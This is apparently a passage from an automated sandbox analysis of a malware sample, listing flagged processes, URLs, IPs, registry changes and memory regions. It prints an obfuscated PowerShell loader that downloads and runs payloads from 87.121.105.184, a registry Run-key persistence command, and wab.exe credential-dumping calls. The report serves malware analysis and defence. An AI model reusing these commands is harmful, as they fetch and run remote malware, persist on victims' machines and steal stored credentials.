PyrarCDiagonoNoctamnPreetet ,ruseeTermosnS.hooltU dema Nordba$DendraS.otogrpof,iceaVaabe.necclesi BystaoEgnsp.lSelleraNonblit,lumuleBasset ');Ordonnant (Andelskapitals 'Phyllo$Ung,arg,fterblBowpotoRumfa b,ivildaMisbeslO erfi:MiseraHOzonedaIsengalEllevtaAlum.rlSavagiaNoniroh Fyrvrs Verge1Sheath4R,gnsk0Attrap Car,i= Lieno Stemme[ AcathSkarr eyMyop rs GratutUnmodieCoercimMorbro.ViksecCC,ddieoSeeweenCopyfiv ReduceOverthr Enight Vejov]Epi rh:Kaff,f:BawbeeFBountirOpsigeoSalvagmkvindeBUretfraSkbnegsOverkneReserv6 F.str4 C aneSTrsklet Flyg.rIndtryi.irginn Lor.cg Trnin(Foreta$ vertrUVansk p Jrnags Unco,l HaylaiConnubpaficio)underk ');Ordonnant (Andelskapitals ' Ug ns$ ChurlgBokserl Unoffo SubstbHarmonaSlavislNrings:Quint,KNeu,roaDigterrBefuldo Termi C,thin=Unlika Be mut[RacemoSBrusenyApokres Un.ertFordabeInterfmUnderk.NondamTMenueteFyrretxMolysbtCanich.SalonmEComplonHovedecZarniwoTransmdBezoariHomeotnEmpha,gSociol]In.ers: Avidi:LatineABlendeSTa,dhjCf tostI,olotoISm.ena.OplageGPolitieUnn tutpuristSPottietDramatrEpidemiTri.esn F,diggCurtes(.iguli$EnhaunHTildr aCyane,lJ,mfrua ,npaylSir psaDefensh LagersB.otek1 Nonre4Smitt.0Ic fal)Tilbud ');Ordonnant (Andelskapitals ' kivie$For,acgPegliklEnvoyeoDaaseab Skriga.odkanl Letfr:Jord,tESammmeuO,ersar ,ejreyBr.geraD likal No.tae inderaforhi.eForl g=Servic$cult.aK M.dulaStblokrReportoZonete.abattis RechauKi,dembH.percsLac imtschreirUnameniCyst,cnDorsivgo clus( Feltb3afs.ib2Oceano5Be,how8Catato0Dovens7Sympto, Knepp2Celleo9Pipist1Goersw2,ibbon0U.iver) ,oate ');Ordonnant $Euryaleae;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvemRestpldStartk Borem./Exo ercAuturg reoler$slith,NCuadrioRugos,nTro.fleRib,onn GorsyvSat niiIntercoLsninguN klassUnbonn) Guin ');Ordonnant (Andelskapitals 'Bo,uso$ Flertg Ost alEksprooTonginb frankaWastlalSpartl:Re.dysBHookeri Progrm YashmiF avrilAfb,ndlCed,ellBas eteSengetnPar lenmand,aiAlvor.aKonver=Fl,wer$Persect O flyaAvisndmIdeanfa Domi,rTjenliiInsemi.ElektrsBy.gelpEnhv.rlRice ii BlodptAndroc( Pumic$ onoloUUn,scunFilteshJasperePate tsDelfitiJo,suntIndtegaAartietS.viori,pladevStartee DrudflHeapsoyG,tevr) Coa,n ');$tamari=$Bimilllennia[0];Ordonnant (Andelskapitals 'Solsik$Srgemag RaphalS gregoAgathibSol.ysaMatronlE broi: MisddA.evareuNonagerAls,diisyst mgNe.fourGela,iaLag inp Bulmeh kom,oyWhitel1.onoch6Me,rif8Civi i=.aacreNGlo,mieSub,arw B.spn-Zeal,dO R prib Kodifj UinaleAd ptec AgermtLedni, Haplo.S curmuyPre.stsSuperatVoldtaePe nagmAlogot.SharewNE emeneFestontKlapsa.UncameW Ngst,eSa.hedbD rgekCExorcilGener,i n wsleB.rricnOppebrtSp ndy ');Ordonnant (Andelskapitals 'Wistar$AnaeroA,ternouVandsprProaliiKuliltgBib iorAccumuaMaksimpLemu eh IntelySydame1Pec,or6Saddel8Reetab. FortsHCircumeTrin.ta icherdPicotieNonprorS epdasFuttoc[ Brand$V,dehaSTa.ientEksploadeklarsPindsve V,deor Bothl1Bygden1Pdofil2 ,osen].onero=Antine$ TirsdNSuffaroRulleknNedkomlForarmoUncircvStsydseSkurkerTryp,n ');$Conjuncts=Andelskapitals 'Dep avA tageuVrtdyrrStraffiManudug Fishbr limmeaVlessap St,rehVerdeny Unorm1Ablati6 Ur,ni8Uds ag.WopsboD UrbanoCerat,wEnshean BenzilMi.dstoGalilaaAdmiradPi.kawFFragmei.orstalSt,muleHooke.(Hydato$Cataget.verdnaPolyanmPre.iaatj.nebrPersoniGlobus,Hir in$s.ildpSBerappp radioaPornognudtrksiRhymero Stropl.ightsaDecentt.plevceRockla)Om.ind ';$Conjuncts=$baaskap[1]+$Conjuncts;$Spaniolate=$baaskap[0];Ordonnant (Andelskapitals 'Spi,el$Afbring Hy,anlBilligo,rejerb sliskaF.gsellAlloyt:OdilesHKulturaMa blyeFiskesmForedeoIntercrStoraarLets nh MandsaPhlebog I cini.opeienDu chygLoused= Colla(Form sTSkadegeV rslasAk,arit Humer- ManifPWallflaChondrtHadronh heter Untott$Parag SSymmetpraveliaC oplan Tilv,iHudgenoAnalg.l .anglaVaretat.useumeUncoor),nkelt ');while (!$Haemorrhaging) {Ordonnant (Andelskapitals 'Bundsn$FilologEnthral Strepo SpectbPannela SpeedlMat,ic: naffFRed,utoha.delr GenopeGrotonsrecondtLsessoi Soranl Demo l.onirriF,udernSyzygegTrstegsBugserkMaskinr Fras,e NoncodLnforssAnti he FamilnSy temeSp ndi= ,rawf$SkrmentForretrShellfu cullieLkkest ') ;Ordonnant $Conjuncts;Ordonnant (Andelskapitals ' friedSadidastA,stema .fblnrForslat Chelo- arbejSU,toadlVrdipaeDupliceSommerpTel.sk Vomere4Cit am ');Ordonnant (Andelskapitals 'Myelof$LogogrgVarliglAr ustoManropbKo,turaShinbol,orhip: LustiHBagslaaElbenmeunvitrmSploshoDil.ymrBemo lrUmaadehGesundaBa tergCathodiSmagstnL.banegBomben=Tvindc(St uthTHaa.cyeRecagis itemit Unsen-SwotteP AbdiaaSvibletFdeegnhgoloch Seders$Sande,SForsigp xpiraKhubbenS.rmeriRomanioHed.ril Oply,aTragedtunconteArgent)Beskyt ') ;Ordonnant (Andelskapitals ' omito$ S,ndegBudgetl Afk.ioBlkhatbG,yconaFlaekhl Nonm :Af.pndC Gremlhpostpalpoodeco metapr Udfr oElkomfhPackmay NaaeddBushelrL mineotermokc bernia megalrClimanbVel.rdo,ysternNemmen=microg$ ,ymphgUgrliglTwitcho.ichenbRes,rpa,ilslulStigm.:Ko torFFremhva Bri.lgDignifkVrd hfrUdmatriS akestNeophiiJouncek hemitkRash uevaabennHk,ene+Eutect+ nterd%Schill$JagheeBOmstniiPr,ikemOmgangiDepotelUpholsl Ballal OverdeHunknsn Pr.tonKlemteiHomoe.aGardeh.Patronc ElectoUnallouHepatanAlbe tt Br.dn ') ;$tamari=$Bimilllennia[$Chlorohydrocarbon];}Ordonnant (Andelskapitals 'Headsa$Kreditg VerdslLe.urioModifibOrthodaAloer.lOphold:MagicsUReprsepretsbesAvicull.edroniEvolvepSllesc Titan= Helin ,nepigGBagkldeBalsamtPerime- PyrarCDiagonoNoctamnPreetet ,ruseeTermosnS.hooltU dema Nordba$DendraS.otogrpof,iceaVaabe.necclesi BystaoEgnsp.lSelleraNonblit,lumuleBasset ');Ordonnant (Andelskapitals 'Phyllo$Ung,arg,fterblBowpotoRumfa b,ivildaMisbeslO erfi:MiseraHOzonedaIsengalEllevtaAlum.rlSavagiaNoniroh Fyrvrs Verge1Sheath4R,gnsk0Attrap Car,i= Lieno Stemme[ AcathSkarr eyMyop rs GratutUnmodieCoercimMorbro.ViksecCC,ddieoSeeweenCopyfiv ReduceOverthr Enight Vejov]Epi rh:Kaff,f:BawbeeFBountirOpsigeoSalvagmkvindeBUretfraSkbnegsOverkneReserv6 F.str4 C aneSTrsklet Flyg.rIndtryi.irginn Lor.cg Trnin(Foreta$ vertrUVansk p Jrnags Unco,l HaylaiConnubpaficio)underk ');Ordonnant (Andelskapitals ' Ug ns$ ChurlgBokserl Unoffo SubstbHarmonaSlavislNrings:Quint,KNeu,roaDigterrBefuldo Termi C,thin=Unlika Be mut[RacemoSBrusenyApokres Un.ertFordabeInterfmUnderk.NondamTMenueteFyrretxMolysbtCanich.SalonmEComplonHovedecZarniwoTransmdBezoariHomeotnEmpha,gSociol]In.ers: Avidi:LatineABlendeSTa,dhjCf tostI,olotoISm.ena.OplageGPolitieUnn tutpuristSPottietDramatrEpidemiTri.esn F,diggCurtes(.iguli$EnhaunHTildr aCyane,lJ,mfrua ,npaylSir psaDefensh LagersB.otek1 Nonre4Smitt.0Ic fal)Tilbud ');Ordonnant (Andelskapitals ' kivie$For,acgPegliklEnvoyeoDaaseab Skriga.odkanl Letfr:Jord,tESammmeuO,ersar ,ejreyBr.geraD likal No.tae inderaforhi.eForl g=Servic$cult.aK M.dulaStblokrReportoZonete.abattis RechauKi,dembH.percsLac imtschreirUnameniCyst,cnDorsivgo clus( Feltb3afs.ib2Oceano5Be,how8Catato0Dovens7Sympto, Knepp2Celleo9Pipist1Goersw2,ibbon0U.iver) ,oate ');Ordonnant $Euryaleae;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"
 malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
 malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag"
 malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\aywoauvyhwlgrptelemijrt"
 malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cajhaffzuedltvhiuphbmeobpae"
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
 malicious
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
unknown
http://www.certplus.com/CRL/class3.crl0
unknown
http://www.e-me.lv/repository0
unknown
http://www.imvu.comr
unknown
http://www.acabogacia.org/doc0
unknown
http://crl.chambersign.org/chambersroot.crl0
unknown
http://ocsp.suscerte.gob.ve0
unknown
https://go.microsoft.co
unknown
http://www.imvu.comta
unknown
http://www.postsignum.cz/crl/psrootqca2.crl02
unknown
http://crl.dhimyotis.com/certignarootca.crl0
unknown
http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
unknown
http://87.121.105.184
unknown
http://www.chambersign.org1
unknown
http://www.pkioverheid.nl/policies/root-policy0
unknown
http://repository.swisssign.com/0
unknown
http://www.nirsoft.net
unknown
http://www.suscerte.gob.ve/lcr0#
unknown
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
unknown
http://crl.ssc.lt/root-c/cacrl.crl0
unknown
http://postsignum.ttc.cz/crl/psrootqca2.crl0
unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0
unknown
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
unknown
http://www.certplus.com/CRL/class3P.crl0
unknown
https://www.google.com
unknown
http://www.suscerte.gob.ve/dpc0
unknown
http://www.certeurope.fr/reference/root2.crl0
unknown
http://www.certplus.com/CRL/class2.crl0
unknown
http://www.disig.sk/ca/crl/ca_disig.crl0
unknown
https://aka.ms/pscore6lB
unknown
http://www.defence.gov.au/pki0
unknown
https://nuget.org/nuget.exe
unknown
http://www.sk.ee/cps/0
unknown
http://www.globaltrust.info0=
unknown
http://www.anf.es
unknown
http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.postsignum.cz/crl/psrootqca4.crl02
unknown
http://pki.registradores.org/normativa/index.htm0
unknown
http://policy.camerfirma.com0
unknown
http://www.ssc.lt/cps03
unknown
http://ocsp.pki.gva.es0
unknown
http://www.anf.es/es/address-direccion.html
unknown
https://www.anf.es/address/)1(0&
unknown
http://87.121.105.184/Udvejningernes.aaf
87.121.105.184
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
unknown
http://ca.mtin.es/mtin/ocsp0
unknown
http://crl.ssc.lt/root-b/cacrl.crl0
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
unknown
http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
unknown
http://www.certicamara.com/dpc/0Z
unknown
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
unknown
https://go.micro
unknown
https://wwww.certigna.fr/autorites/0m
unknown
http://www.dnie.es/dpc0
unknown
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://87.121.105.184/sviLEH127.bin
87.121.105.184
http://ca.mtin.es/mtin/DPCyPoliticas0
unknown
https://www.anf.es/AC/ANFServerCA.crl0
unknown
https://repository.tsp.zetes.com0
unknown
http://www.globaltrust.info0
unknown
http://certificates.starfieldtech.com/repository/1604
unknown
http://acedicom.edicomgroup.com/doc0
unknown
http://www.certplus.com/CRL/class3TS.crl0
unknown
https://github.com/Pester/Pester
unknown
https://crl.anf.es/AC/ANFServerCA.crl0
unknown
http://www.certeurope.fr/reference/pc-root2.pdf0
unknown
http://ac.economia.gob.mx/last.crl0G
unknown
https://www.catcert.net/verarrel
unknown
http://www.disig.sk/ca0f
unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
unknown
http://www.e-szigno.hu/RootCA.crl
unknown
http://www.sk.ee/juur/crl/0
unknown
http://crl.chambersign.org/chambersignroot.crl0
unknown
http://crl.xrampsecurity.com/XGCA.crl0
unknown
http://certs.oati.net/repository/OATICA2.crl0
unknown
http://crl.oces.trust2408.com/oces.crl0
unknown
http://www.quovadis.bm0
unknown
https://www.google.com/accounts/servicelogin
unknown
http://crl.ssc.lt/root-a/cacrl.crl0
unknown
http://certs.oaticerts.com/repository/OATICA2.crl
unknown
http://certs.oati.net/repository/OATICA2.crt0
unknown
http://www.accv.es00
unknown
http://www.pkioverheid.nl/policies/root-policy-G20
unknown
https://www.netlock.net/docs
unknown
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
unknown
http://www.e-trust.be/CPS/QNcerts
unknown
http://ocsp.ncdc.gov.sa0
unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0
unknown
http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
unknown
http://crl2.postsignum.cz/crl/psrootqca4.crl01
unknown
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
unknown
http://web.ncdc.gov.sa/crl/nrcaparta1.crl
unknown
http://www.datev.de/zertifikat-policy-int0
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.214.172
paygateme.net
146.70.57.34
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
87.121.105.184
unknown
Bulgaria
178.237.33.50
geoplugin.net
Netherlands
146.70.57.34
paygateme.net
United Kingdom

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Sortiment
Anadems
HKEY_CURRENT_USER\Environment
Piptadenia
HKEY_CURRENT_USER\SOFTWARE\Rmc-WTDTSU
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-WTDTSU
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-WTDTSU
time
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Nuchale
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
6604000
heap
page read and write
 malicious
A8C3000
direct allocation
page execute and read and write
 malicious
9450000
direct allocation
page execute and read and write
 malicious
2B7B8242000
trusted library allocation
page read and write
 malicious
5A73000
trusted library allocation
page read and write
 malicious
33A4000
heap
page read and write
1ABE8833000
heap
page read and write
1ABE88BD000
heap
page read and write
4DE000
stack
page read and write
73E0000
trusted library allocation
page read and write
2B7AA18A000
trusted library allocation
page read and write
A40000
trusted library allocation
page read and write
22585000
heap
page read and write
459000
system
page execute and read and write
6BFE000
stack
page read and write
7450000
trusted library allocation
page read and write
2B7A6640000
heap
page read and write
644000
heap
page read and write
1ABE8877000
heap
page read and write
730E000
stack
page read and write
33A4000
heap
page read and write
1ABE86F2000
heap
page read and write
C70000
heap
page execute and read and write
2B7C06CC000
heap
page read and write
A0D000
heap
page read and write
A11000
heap
page read and write
A01000
heap
page read and write
2B7A87F6000
trusted library allocation
page read and write
7FFD9BD10000
trusted library allocation
page read and write
9070000
heap
page read and write
6624000
heap
page read and write
1ABE8882000
heap
page read and write
A44000
trusted library allocation
page read and write
2B7A6770000
heap
page read and write
A10000
heap
page read and write
226E8000
heap
page read and write
70C9000
heap
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
2B7C07F0000
heap
page read and write
4888000
heap
page read and write
1ABE6A1B000
heap
page read and write
1ABE88C1000
heap
page read and write
1ABE8706000
heap
page read and write
A11000
heap
page read and write
1ABE870E000
heap
page read and write
AA1000
heap
page read and write
1ABE88B5000
heap
page read and write
A10000
heap
page read and write
2B7A81D1000
trusted library allocation
page read and write
2B7A8C6C000
trusted library allocation
page read and write
2B7A8CE9000
trusted library allocation
page read and write
9033000
heap
page read and write
A1D000
heap
page read and write
7360000
trusted library allocation
page execute and read and write
A97000
heap
page read and write
930B000
stack
page read and write
22571000
heap
page read and write
7230000
heap
page execute and read and write
1ABE889F000
heap
page read and write
662C000
heap
page read and write
7E50000
trusted library allocation
page read and write
6624000
heap
page read and write
23816000
heap
page read and write
4E8000
heap
page read and write
2DCF000
stack
page read and write
CC3B07C000
stack
page read and write
2C00000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
61C3DFF000
stack
page read and write
7370000
trusted library allocation
page read and write
1ABE67CC000
heap
page read and write
1ABE88AC000
heap
page read and write
1ABE88CB000
heap
page read and write
2F40000
heap
page read and write
4760000
heap
page read and write
4888000
heap
page read and write
2B7C06EA000
heap
page read and write
1ABE895B000
heap
page read and write
644000
heap
page read and write
7220000
trusted library allocation
page read and write
1ABE87E0000
heap
page read and write
1ABE67A0000
heap
page read and write
1ABE8880000
heap
page read and write
1ABE86EA000
heap
page read and write
1ABE8739000
heap
page read and write
4A80000
trusted library allocation
page read and write
47B0000
heap
page read and write
6621000
heap
page read and write
2B7A9E03000
trusted library allocation
page read and write
2B7A8729000
trusted library allocation
page read and write
9490000
direct allocation
page read and write
7FFD9BA66000
trusted library allocation
page execute and read and write
371D000
heap
page read and write
1ABE6757000
heap
page read and write
2F0C000
stack
page read and write
1ABE8901000
heap
page read and write
73D0000
trusted library allocation
page read and write
A11000
heap
page read and write
1ABE895A000
heap
page read and write
4A80000
trusted library allocation
page read and write
4881000
heap
page read and write
FC000
stack
page read and write
1ABE676E000
heap
page read and write
1ABE881D000
heap
page read and write
F6E000
stack
page read and write
A6C000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
A00000
heap
page read and write
C60000
trusted library allocation
page execute and read and write
7430000
trusted library allocation
page read and write
1ABE67E9000
heap
page read and write
2B7A81C5000
heap
page read and write
2B7AA19B000
trusted library allocation
page read and write
22671000
heap
page read and write
2B7A9DD2000
trusted library allocation
page read and write
1ABE8808000
heap
page read and write
7210000
trusted library allocation
page read and write
CC3B1FE000
stack
page read and write
1ABE88A9000
heap
page read and write
1ABE882A000
heap
page read and write
2B7A68D0000
heap
page read and write
1ABE67CC000
heap
page read and write
2B7AA362000
trusted library allocation
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
644000
heap
page read and write
71E0000
trusted library allocation
page read and write
A13000
heap
page read and write
FAE000
stack
page read and write
1ABE8901000
heap
page read and write
2B7B81E0000
trusted library allocation
page read and write
1ABE88E1000
heap
page read and write
1ABE86EA000
heap
page read and write
1ABE67CA000
heap
page read and write
B6A000
trusted library allocation
page execute and read and write
CC3AB83000
stack
page read and write
A39000
heap
page read and write
22671000
heap
page read and write
22671000
heap
page read and write
30B0000
heap
page read and write
6CC0000
heap
page read and write
645000
heap
page read and write
33A4000
heap
page read and write
1E158620000
heap
page read and write
A11000
heap
page read and write
1ABE86E4000
heap
page read and write
73C0000
trusted library allocation
page read and write
2B7C08F0000
heap
page read and write
51AF000
stack
page read and write
2B7A9DEB000
trusted library allocation
page read and write
A19000
heap
page read and write
1E1587A0000
heap
page read and write
1ABE6758000
heap
page read and write
23813000
heap
page read and write
C8D000
heap
page read and write
CC3C0CE000
stack
page read and write
2B7A86F4000
trusted library allocation
page read and write
7177000
heap
page read and write
61C38FF000
stack
page read and write
71A0000
heap
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
2B7A8BBC000
trusted library allocation
page read and write
644000
heap
page read and write
644000
heap
page read and write
CC3C04E000
stack
page read and write
33A4000
heap
page read and write
7FFD9BA40000
trusted library allocation
page execute and read and write
A19000
heap
page read and write
A19000
heap
page read and write
2CC5000
heap
page read and write
6615000
heap
page read and write
A10000
trusted library section
page read and write
1ABE8711000
heap
page read and write
AFC000
heap
page read and write
1ABE67DC000
heap
page read and write
2B7AA3D0000
trusted library allocation
page read and write
2B7A66BA000
heap
page read and write
47C1000
trusted library allocation
page read and write
1ABE8815000
heap
page read and write
A14000
heap
page read and write
A1D000
heap
page read and write
7F20000
trusted library allocation
page execute and read and write
9470000
trusted library allocation
page execute and read and write
1ABE89AA000
heap
page read and write
93A0000
trusted library allocation
page read and write
1ABE881C000
heap
page read and write
A18000
heap
page read and write
2B7A8CC9000
trusted library allocation
page read and write
33A4000
heap
page read and write
33A4000
heap
page read and write
2B7A6810000
heap
page readonly
A19000
heap
page read and write
A0D000
heap
page read and write
1ABE6801000
heap
page read and write
CC3B67C000
stack
page read and write
2FC0000
heap
page readonly
2B7A83F8000
trusted library allocation
page read and write
6630000
heap
page read and write
22771000
heap
page read and write
33A4000
heap
page read and write
2B7C01D0000
heap
page read and write
1ABE87E1000
heap
page read and write
1ABE88B3000
heap
page read and write
7FFD9B984000
trusted library allocation
page read and write
2B7A96E9000
trusted library allocation
page read and write
A19000
heap
page read and write
557000
stack
page read and write
33AE000
stack
page read and write
73A0000
trusted library allocation
page read and write
CC3AFFE000
stack
page read and write
28AF000
unkown
page read and write
2B7A85E3000
trusted library allocation
page read and write
1ABE8702000
heap
page read and write
A2B000
heap
page read and write
2B7A8C55000
trusted library allocation
page read and write
A0C000
heap
page read and write
400000
system
page execute and read and write
A14000
heap
page read and write
1ABE88C1000
heap
page read and write
7E60000
trusted library allocation
page read and write
71C2000
trusted library allocation
page read and write
6BA0000
direct allocation
page read and write
22671000
heap
page read and write
1ABE8882000
heap
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
9DA000
heap
page read and write
1ABE887F000
heap
page read and write
7200000
trusted library allocation
page read and write
26B0000
heap
page read and write
22671000
heap
page read and write
9042000
heap
page read and write
A11000
heap
page read and write
645000
heap
page read and write
33A4000
heap
page read and write
70B0000
heap
page read and write
2B7A9E18000
trusted library allocation
page read and write
A8A000
heap
page read and write
90BB000
heap
page read and write
A0C000
heap
page read and write
BB0000
heap
page execute and read and write
7FFD9B982000
trusted library allocation
page read and write
2B7A6800000
trusted library allocation
page read and write
A6E000
heap
page read and write
644000
heap
page read and write
ADD000
heap
page read and write
1ABE897F000
